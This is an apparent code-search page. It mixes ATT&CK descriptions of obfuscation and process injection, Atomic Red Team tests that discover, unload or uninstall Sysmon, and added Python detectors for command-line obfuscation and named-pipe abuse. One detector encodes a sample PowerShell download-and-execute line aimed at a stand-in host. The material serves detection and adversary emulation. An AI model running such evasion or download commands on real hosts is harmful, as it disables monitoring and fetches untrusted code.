seemingly benign files that only reveal malicious functionality when reassembled. (Citation: Carbon Black Obfuscation Sept 2016)\n\nAdversaries may also obfuscate commands executed from payloads or directly via a Command-Line Interface. Environment variables, aliases, characters, and other platform/language specific semantics can be used to evade signature based detections and whitelisting mechanisms. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye Revoke-Obfuscation July 2017) (Citation: PaloAlto EncodedCommand March 2017)\n\nAnother example of obfuscation is through the use of steganography, a technique of hiding messages or code in images, audio tracks, video clips, or text files. One of the first known and reported adversaries that used steganography activity surrounding Invoke-PSImage. 
The Duqu malware encrypted the gathered information from a victim's system and hid it in an image, then exfiltrated the image to a C2 server. (Citation: Wikipedia Duqu) By the end of 2017, an adversary group used Invoke-PSImage to hide PowerShell commands in an image file (png) and execute the code on a victim's system. In this particular case the PowerShell code downloaded another obfuscated script to gather intelligence from the victim's machine and communicate it back to the adversary. (Citation: McAfee Malicious Doc Targets Pyeongchang Olympics)\n\nDetection: Detection of file obfuscation is difficult unless artifacts are left behind by the obfuscation process that are uniquely detectable with a signature. If detection of the obfuscation itself is not possible, it may be possible to detect the malicious activity that caused the obfuscated file (for example, the method that was used to write, read, or modify the file on the file system).\n\nFlag and analyze commands containing indicators of obfuscation and known suspicious syntax such as uninterpreted escape characters like '''^''' and '''\"'''. Windows' Sysmon and Event ID 4688 display command-line arguments for processes. Deobfuscation tools can be used to detect these indicators in files/payloads. (Citation: GitHub Revoke-Obfuscation) (Citation: FireEye Revoke-Obfuscation July 2017) (Citation: GitHub Office-Crackros Aug 2016)\n\nObfuscation used in payloads for Initial Access can be detected on the network. Use network intrusion detection systems and email gateway filtering to identify compressed and encrypted attachments and scripts. Some email attachment detonation systems can open compressed and encrypted attachments. 
Payloads delivered over an encrypted connection from a website require encrypted network traffic inspection.\n\nPlatforms: Linux, macOS, Windows\n\nData Sources: Network protocol analysis, Process use of network, Binary file metadata, File monitoring, Malware reverse engineering, Process command-line parameters, Environment variable, Process Monitoring, Windows event logs, Network intrusion detection system, Email gateway, SSL/TLS inspection\n\nDefense Bypassed: Host forensic analysis, Signature-based detection, Host intrusion prevention systems, Application whitelisting, Process whitelisting, Log analysis, Whitelisting by file name or path\n\nContributors: Red Canary, Christiaan Beek, @ChristiaanBeek", |
© ESET 2014-2018 |
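The detection text in the Obfuscated Files or Information description above says to flag command lines carrying uninterpreted escape characters such as ^ and \" and names Sysmon and Security Event ID 4688 as the sources of those command lines. The Python below is an added example, not code from the MISP event or from ATT&CK: it runs a small set of obfuscation indicators over constructed Sysmon Event ID 1 records and, where it finds PowerShell's -EncodedCommand switch, recovers the hidden script. The indicator patterns, the sample records and the encoded payload are all the editor's constructions.

```python
"""Triage Sysmon Event ID 1 / Security 4688 command lines for obfuscation.

Added example, not code from the MISP event or from ATT&CK. The records and
the encoded payload below are constructed; field names mirror Sysmon
Event ID 1 (ProcessId, Image, CommandLine).
"""
import base64
import re

# Indicators: the uninterpreted ^ and \" escapes named in the detection text,
# the -EncodedCommand switch, and two cmd/PowerShell tricks chosen by the editor.
INDICATORS = [
    ("caret_escape", re.compile(r"\w\^\w")),                           # p^o^w^e^r
    ("escaped_quote", re.compile(r'\\"')),                             # literal \"
    ("env_substring", re.compile(r"%\w+:~-?\d+(?:,-?\d+)?%", re.I)),  # %COMSPEC:~0,3%
    ("ps_string_concat", re.compile(r"'\s*\+\s*'")),                   # 'Inv'+'oke'
    ("encoded_command",
     re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)),
]
ENCODED_RX = INDICATORS[-1][1]

# Constructed payload an attacker would hide behind -EncodedCommand
# (PowerShell expects UTF-16LE text, base64-encoded).
PLAINTEXT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s.ps1')"
ENC_PAYLOAD = base64.b64encode(PLAINTEXT.encode("utf-16-le")).decode("ascii")

# Constructed Sysmon Event ID 1 records: one benign, five obfuscated.
SAMPLE_EVENTS = [
    {"ProcessId": 1001, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cmd.exe /c dir "C:\Program Files"'},
    {"ProcessId": 1002, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cmd.exe /c p^o^w^e^r^s^h^e^l^l -nop -c "whoami"'},
    {"ProcessId": 1003, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c %COMSPEC:~0,3% /c echo pwned"},
    {"ProcessId": 1004, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": f"powershell.exe -nop -w hidden -enc {ENC_PAYLOAD}"},
    {"ProcessId": 1005, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -c \"&('Inv'+'oke-Expression') (Get-Content x.txt)\""},
    {"ProcessId": 1006, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cmd.exe /c "powershell -c \"Get-Process\""'},
]


def obfuscation_indicators(cmdline):
    """Names of the indicators present in one command line (empty if clean)."""
    return [name for name, rx in INDICATORS if rx.search(cmdline)]


def decode_encoded_command(cmdline):
    """Recover the script behind -EncodedCommand (base64 of UTF-16LE), or None."""
    m = ENCODED_RX.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # not real base64/UTF-16: report the indicator, no decode


def triage(events):
    """{ProcessId: {"indicators": [...], "decoded": str | None}} for hits only."""
    hits = {}
    for ev in events:
        found = obfuscation_indicators(ev["CommandLine"])
        if found:
            hits[ev["ProcessId"]] = {"indicators": found,
                                     "decoded": decode_encoded_command(ev["CommandLine"])}
    return hits


if __name__ == "__main__":
    for pid, info in triage(SAMPLE_EVENTS).items():
        print(pid, info["indicators"], info["decoded"] or "")
```

The patterns are deliberately narrow (a caret between two word characters, a literal backslash-quote, the %VAR:~n,m% substring form) so that ordinary quoting in command lines does not fire; the decoded PowerShell is what an analyst would then feed to Revoke-Obfuscation or similar tooling cited above.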
malware-ioc |
misp-turla-powershell-event.json |
"description": "Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.\n\n===Windows===\n\nThere are multiple approaches to injecting code into a live process. Windows implementations include: (Citation: Engame Process Injection July 2017)\n* '''Dynamic-link library (DLL) injection''' involves writing the path to a malicious DLL inside a process, then invoking execution by creating a remote thread.\n* '''Portable executable injection''' involves writing malicious code directly into the process (without a file on disk), then invoking execution with either additional code or by creating a remote thread. The displacement of the injected code introduces the additional requirement for functionality to remap memory references. Variations of this method such as reflective DLL injection (writing a self-mapping DLL into a process) and memory module (map DLL when writing into process) overcome the address relocation issue. (Citation: Endgame HuntingNMemory June 2017)\n* '''Thread execution hijacking''' involves injecting malicious code or the path to a DLL into a thread of a process. Similar to Process Hollowing, the thread must first be suspended.\n* '''Asynchronous Procedure Call''' (APC) injection involves attaching malicious code to the APC Queue (Citation: Microsoft APC) of a process's thread. Queued APC functions are executed when the thread enters an alertable state. AtomBombing (Citation: ENSIL AtomBombing Oct 2016) is a variation that utilizes APCs to invoke malicious code previously written to the global atom table. 
(Citation: Microsoft Atom Table)\n* '''Thread Local Storage''' (TLS) callback injection involves manipulating pointers inside a portable executable (PE) to redirect a process to malicious code before reaching the code's legitimate entry point. (Citation: FireEye TLS Nov 2017)\n\n===Mac and Linux===\n\nImplementations for Linux and OS X/macOS systems include: (Citation: Datawire Code Injection) (Citation: Uninformed Needle)\n*'''LD_PRELOAD, LD_LIBRARY_PATH''' (Linux), '''DYLD_INSERT_LIBRARIES''' (Mac OS X) environment variables, or the dlfcn application programming interface (API) can be used to dynamically load a library (shared object) into a process, which can then be used to intercept API calls from the running process. (Citation: Phrack halfdead 1997)\n*'''Ptrace system calls''' can be used to attach to a running process and modify it at runtime. (Citation: Uninformed Needle)\n*'''/proc/[pid]/mem''' provides access to the memory of the process and can be used to read/write arbitrary data to it. This technique is very rare due to its complexity. (Citation: Uninformed Needle)\n*'''VDSO hijacking''' performs runtime injection on ELF binaries by manipulating code stubs mapped in from the linux-vdso.so shared object. (Citation: VDSO hijack 2009)\n\nMalware commonly utilizes process injection to access system resources through which Persistence and other environment modifications can be made. More sophisticated samples may perform multiple process injections to segment modules and further evade detection, utilizing named pipes or other inter-process communication (IPC) mechanisms as a communication channel.\n\nDetection: Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. 
API calls such as CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, QueueUserAPC, and those that can be used to modify memory within another process, such as WriteProcessMemory, may be used for this technique. (Citation: Engame Process Injection July 2017)\n\nMonitoring for Linux specific calls such as the ptrace system call, the use of LD_PRELOAD environment variable, or dlfcn dynamic linking API calls, should not generate large amounts of data due to their specialized nature, and can be a very effective method to detect some of the common process injection methods. (Citation: ArtOfMemoryForensics) (Citation: GNU Acct) (Citation: RHEL auditd) (Citation: Chokepoint preload rootkits)\n\nMonitor for named pipe creation and connection events (Event IDs 17 and 18) for possible indicators of infected processes with external modules. (Citation: Microsoft Sysmon v6 May 2017)\n\nMonitor processes and command-line arguments for actions that could be done before or after code injection has occurred and correlate the information with related event information. Code injection may also be performed using PowerShell with tools such as PowerSploit, (Citation: Powersploit) so additional PowerShell monitoring may be required to cover known implementations of this behavior.\n\nPlatforms: Linux, macOS, Windows\n\nData Sources: API monitoring, Windows Registry, File monitoring, DLL monitoring, Named Pipes, Process Monitoring\n\nEffective Permissions: User, Administrator, SYSTEM, root\n\nDefense Bypassed: Process whitelisting, Anti-virus\n\nPermissions Required: User, Administrator, SYSTEM, root\n\nContributors: Anastasios Pingios", |
© ESET 2014-2018 |
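The Process Injection detection text above recommends monitoring Sysmon named pipe creation and connection events (Event IDs 17 and 18) as indicators of injected modules talking to each other over IPC. The Python below is an added example, not code from the MISP event or from ATT&CK: it joins constructed ID 17 (PipeEvent created) and ID 18 (PipeEvent connected) records by pipe name and reports cross-process pairs where at least one endpoint runs from outside an allowlisted system directory. The allowlist, the sample records and the pipe names are the editor's constructions; Sysmon only emits 17/18 when its configuration includes PipeEvent rules.

```python
"""Correlate Sysmon PipeEvent records: ID 17 (pipe created) with ID 18 (connected).

Added example for the detection note above, not code from the MISP event or
from ATT&CK. Records are constructed; field names follow Sysmon's PipeEvent
schema (EventID, PipeName, Image, ProcessId).
"""
from collections import defaultdict

# Binaries under these directories create and connect to many pipes normally;
# a cross-process pipe is reported only when at least one end runs elsewhere.
# Editor's heuristic, not a Sysmon feature.
TRUSTED_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\", "c:\\program files\\")


def is_trusted(image):
    img = image.lower()
    return any(img.startswith(d) for d in TRUSTED_DIRS)


# Constructed events: normal system IPC, a browser talking to its own workers,
# a pipe served from a user-writable path that a system binary connects to,
# and a connection whose server was never seen being created.
SAMPLE_EVENTS = [
    {"EventID": 17, "PipeName": r"\lsass", "Image": r"C:\Windows\System32\lsass.exe", "ProcessId": 700},
    {"EventID": 18, "PipeName": r"\lsass", "Image": r"C:\Windows\System32\svchost.exe", "ProcessId": 1120},
    {"EventID": 17, "PipeName": r"\mojo.2200.1", "Image": r"C:\Program Files\Browser\browser.exe", "ProcessId": 2200},
    {"EventID": 18, "PipeName": r"\mojo.2200.1", "Image": r"C:\Program Files\Browser\browser.exe", "ProcessId": 2201},
    {"EventID": 17, "PipeName": r"\updsvc-4412", "Image": r"C:\Users\Public\update.exe", "ProcessId": 4412},
    {"EventID": 18, "PipeName": r"\updsvc-4412", "Image": r"C:\Windows\System32\rundll32.exe", "ProcessId": 4488},
    {"EventID": 18, "PipeName": r"\rpc-9f3e", "Image": r"C:\Users\Public\loader.exe", "ProcessId": 5120},
]


def _split(events):
    servers, clients = defaultdict(list), defaultdict(list)
    for ev in events:
        if ev["EventID"] == 17:
            servers[ev["PipeName"]].append(ev)
        elif ev["EventID"] == 18:
            clients[ev["PipeName"]].append(ev)
    return servers, clients


def correlate_pipes(events):
    """Join creators and connectors by PipeName; return the cross-process
    pairs where either side runs outside TRUSTED_DIRS."""
    servers, clients = _split(events)
    findings = []
    for pipe, conns in clients.items():
        for srv in servers.get(pipe, []):
            for cli in conns:
                if srv["Image"].lower() == cli["Image"].lower():
                    continue  # one program's own worker IPC
                if is_trusted(srv["Image"]) and is_trusted(cli["Image"]):
                    continue  # both system-owned: the noise the text warns about
                findings.append({"PipeName": pipe,
                                 "server": (srv["ProcessId"], srv["Image"]),
                                 "client": (cli["ProcessId"], cli["Image"])})
    return findings


def orphan_connections(events):
    """ID 18 events whose pipe was never seen created: the server predates the
    collection window or lives in an excluded process. Lower priority, but a
    user-path client is still worth a look."""
    servers, clients = _split(events)
    return [ev for pipe, evs in clients.items() if pipe not in servers for ev in evs]


if __name__ == "__main__":
    for f in correlate_pipes(SAMPLE_EVENTS):
        print("cross-process pipe", f)
    for ev in orphan_connections(SAMPLE_EVENTS):
        print("connect without observed create", ev["PipeName"], ev["Image"])
```

On real telemetry the join should be bounded by time and by the pipe's lifetime (a pipe name is reused), and the allowlist should be replaced with whatever the environment already uses to describe expected binaries.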
malware-ioc |
misp-turla-powershell-event.json |
"https://docs.microsoft.com/sysinternals/downloads/sysmon" |
© ESET 2014-2018 |
atomic-red-team |
index.md |
- Atomic Test #10: Unload Sysmon Filter Driver [windows] |
MIT License. © 2018 Red Canary |
atomic-red-team |
index.md |
- Atomic Test #11: Uninstall Sysmon [windows] |
MIT License. © 2018 Red Canary |
atomic-red-team |
index.md |
- Atomic Test #5: Security Software Discovery - Sysmon Service [windows] |
MIT License. © 2018 Red Canary |
atomic-red-team |
windows-index.md |
- Atomic Test #10: Unload Sysmon Filter Driver [windows] |
MIT License. © 2018 Red Canary |
atomic-red-team |
windows-index.md |
- Atomic Test #11: Uninstall Sysmon [windows] |
MIT License. © 2018 Red Canary |
atomic-red-team |
windows-index.md |
- Atomic Test #5: Security Software Discovery - Sysmon Service [windows] |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1518.001.md |
- Atomic Test #5 - Security Software Discovery - Sysmon Service |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1518.001.md |
## Atomic Test #5 - Security Software Discovery - Sysmon Service |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1518.001.md |
Discovery of an installed Sysinternals Sysmon service using driver altitude (even if the name is changed). |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1518.001.md |
When successfully executed, the test displays the Sysmon driver instance if it is installed.
MIT License. © 2018 Red Canary |
atomic-red-team |
T1562.001.md |
- Atomic Test #10 - Unload Sysmon Filter Driver |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1562.001.md |
- Atomic Test #11 - Uninstall Sysmon |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1562.001.md |
## Atomic Test #10 - Unload Sysmon Filter Driver |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1562.001.md |
Unloads the Sysinternals Sysmon filter driver without stopping the Sysmon service. To verify successful execution,
MIT License. © 2018 Red Canary |
atomic-red-team |
T1562.001.md |
run the prereq_commands and they should fail with the error "sysmon filter must be loaded".
MIT License. © 2018 Red Canary |
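Two of the Atomic Red Team items above describe checks that can be automated from command output: Atomic Test #5 finds an installed Sysmon by its minifilter altitude even when the driver has been renamed, and Atomic Test #10 leaves the host in a state where the Sysmon service is running but its filter driver is unloaded, so the "sysmon filter must be loaded" prerequisite fails. The Python below is an added example, not code from Atomic Red Team: it parses constructed `fltmc filters` and `sc query sysmon` output and classifies the host. The sample outputs are the editor's constructions; 385201 is Sysmon's documented default minifilter altitude, a number the page itself does not state, and `fltmc` needs an elevated prompt.

```python
"""Find Sysmon by minifilter altitude and cross-check it against the service.

Added example covering Atomic Test #5 (discovery via driver altitude, even if
renamed) and Atomic Test #10 (filter unloaded while the service keeps running).
Not code from Atomic Red Team. The `fltmc filters` and `sc query` outputs are
constructed samples; 385201 is Sysmon's documented default altitude.
"""
import re

SYSMON_ALTITUDE = 385201
DEFAULT_DRIVER = "sysmondrv"

# Constructed `fltmc filters` output: default install, renamed driver, and
# the same host after the Sysmon filter was unloaded.
FLTMC_DEFAULT = """\
Filter Name                     Num Instances    Altitude    Frame
------------------------------  -------------  ------------  -----
bindflt                                 1       409800         0
SysmonDrv                               8       385201         0
WdFilter                               11       328010         0
luafv                                   1       135000         0
FileInfo                               12        40500         0
"""
FLTMC_RENAMED = FLTMC_DEFAULT.replace("SysmonDrv", "EdrHelper")
FLTMC_UNLOADED = "\n".join(
    line for line in FLTMC_DEFAULT.splitlines() if "385201" not in line) + "\n"

# Constructed `sc query sysmon` outputs.
SC_RUNNING = """\
SERVICE_NAME: sysmon
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 4  RUNNING
                                (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
"""
SC_STOPPED = SC_RUNNING.replace("4  RUNNING", "1  STOPPED")
SC_MISSING = ("[SC] EnumQueryServicesStatus:OpenService FAILED 1060:\n\n"
              "The specified service does not exist as an installed service.\n")

# Data rows end in three integer columns; the header and separator do not.
FILTER_ROW = re.compile(r"^(\S+)\s+(\d+)\s+(\d+)\s+(\d+)$")


def parse_fltmc(text):
    """[(name, instances, altitude, frame)] from `fltmc filters` output."""
    rows = []
    for line in text.splitlines():
        m = FILTER_ROW.match(line.strip())
        if m:
            rows.append((m.group(1), int(m.group(2)), int(m.group(3)), int(m.group(4))))
    return rows


def find_sysmon_filter(text):
    """Name of the filter registered at Sysmon's altitude, whatever it is called."""
    for name, _instances, altitude, _frame in parse_fltmc(text):
        if altitude == SYSMON_ALTITUDE:
            return name
    return None


def service_state(text):
    """'RUNNING', 'STOPPED', ... from `sc query`, or None if not installed."""
    m = re.search(r"^\s*STATE\s*:\s*\d+\s+(\w+)", text, re.M)
    return m.group(1) if m else None


def assess(fltmc_text, sc_text):
    """Combine both views. 'driver_unloaded' is the Atomic Test #10 state:
    service up, filter gone, so the service is no longer recording anything."""
    name = find_sysmon_filter(fltmc_text)
    state = service_state(sc_text)
    if name is None:
        verdict = "driver_unloaded" if state == "RUNNING" else "absent"
    elif state != "RUNNING":
        verdict = "service_not_running"
    elif name.lower() == DEFAULT_DRIVER:
        verdict = "healthy"
    else:
        verdict = "renamed"
    return {"driver": name, "service": state, "verdict": verdict}


if __name__ == "__main__":
    for label, flt, svc in [("default", FLTMC_DEFAULT, SC_RUNNING),
                            ("renamed", FLTMC_RENAMED, SC_RUNNING),
                            ("unloaded", FLTMC_UNLOADED, SC_RUNNING),
                            ("removed", FLTMC_UNLOADED, SC_MISSING)]:
        print(label, assess(flt, svc))
```

On a live host, replace the constants with the stdout of `fltmc filters` and `sc query <service name>` run from an elevated prompt; a renamed service needs its own name in the `sc` call, whereas the altitude check works without knowing the driver name.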
atomic-red-team |
T1562.001.md |
| sysmon_driver | The name of the Sysmon filter driver (this can change from the default) | String | SysmonDrv| |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1562.001.md |
sysmon -u > nul 2>&1
MIT License. © 2018 Red Canary |
atomic-red-team |
T1562.001.md |
sysmon -accepteula -i > nul 2>&1
MIT License. © 2018 Red Canary |
atomic-red-team |
T1562.001.md |
%temp%\Sysmon\sysmon.exe -u > nul 2>&1 |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1562.001.md |
%temp%\Sysmon\sysmon.exe -accepteula -i > nul 2>&1 |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1562.001.md |
##### Description: Sysmon must be downloaded |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1562.001.md |
if ((cmd.exe /c "where.exe Sysmon.exe 2> nul | findstr Sysmon 2> nul") -or (Test-Path $env:Temp\Sysmon\Sysmon.exe)) { exit 0 } else { exit 1 }
MIT License. © 2018 Red Canary |
atomic-red-team |
T1562.001.md |
Invoke-WebRequest "https://download.sysinternals.com/files/Sysmon.zip" -OutFile "$env:TEMP\Sysmon.zip"
MIT License. © 2018 Red Canary |
atomic-red-team |
T1562.001.md |
Expand-Archive $env:TEMP\Sysmon.zip $env:TEMP\Sysmon -Force |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1562.001.md |
Remove-Item $env:TEMP\Sysmon.zip -Force |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1562.001.md |
##### Description: sysmon must be Installed |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1562.001.md |
if(sc.exe query sysmon | findstr sysmon) { exit 0 } else { exit 1 } |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1562.001.md |
if(cmd.exe /c "where.exe Sysmon.exe 2> nul | findstr Sysmon 2> nul") { C:\Windows\Sysmon.exe -accepteula -i } else
MIT License. © 2018 Red Canary |
atomic-red-team |
T1562.001.md |
{ Set-Location $env:TEMP\Sysmon\; .\Sysmon.exe -accepteula -i} |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1562.001.md |
##### Description: sysmon filter must be loaded |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1562.001.md |
sysmon -u |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1562.001.md |
sysmon -accepteula -i |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1562.001.md |
## Atomic Test #11 - Uninstall Sysmon |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1562.001.md |
Uninstall Sysinternals Sysmon for Defense Evasion |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1562.001.md |
| sysmon_exe | The location of the Sysmon executable from Sysinternals (ignored if sysmon.exe is found in your PATH) | Path | PathToAtomicsFolder\T1562.001\bin\sysmon.exe| |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1562.001.md |
sysmon -i -accepteula >nul 2>&1 |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1562.001.md |
##### Description: Sysmon executable must be available |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1562.001.md |
if(cmd /c where sysmon) {exit 0} else {exit 1} |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1562.001.md |
$parentpath = Split-Path "#{sysmon_exe}"; $zippath = "$parentpath\Sysmon.zip"
MIT License. © 2018 Red Canary |
atomic-red-team |
T1562.001.md |
Invoke-WebRequest "https://download.sysinternals.com/files/Sysmon.zip" -OutFile "$zippath"
MIT License. © 2018 Red Canary |
atomic-red-team |
T1562.001.md |
##### Description: Sysmon must be installed |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1562.001.md |
if(cmd /c sc query sysmon) { exit 0} else { exit 1} |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1562.001.md |
cmd /c sysmon -i -accepteula |
MIT License. © 2018 Red Canary |
signature-base |
apt_tick_weaponized_usb.yar |
description = "Detects Sysmon Loader from Tick group incident - Weaponized USB"
CC BY-NC 4.0 |
stockpile |
7a6ba833-de40-466a-8969-5c37b13603e0.yml |
"sysmon", |
Apache-2.0 |
stockpile |
fcf71ee3-d1a9-4136-b919-9e5f6da43608.yml |
description: Clear Sysmon logs [intended to trigger CAR-2016-04-002] |
Apache-2.0 |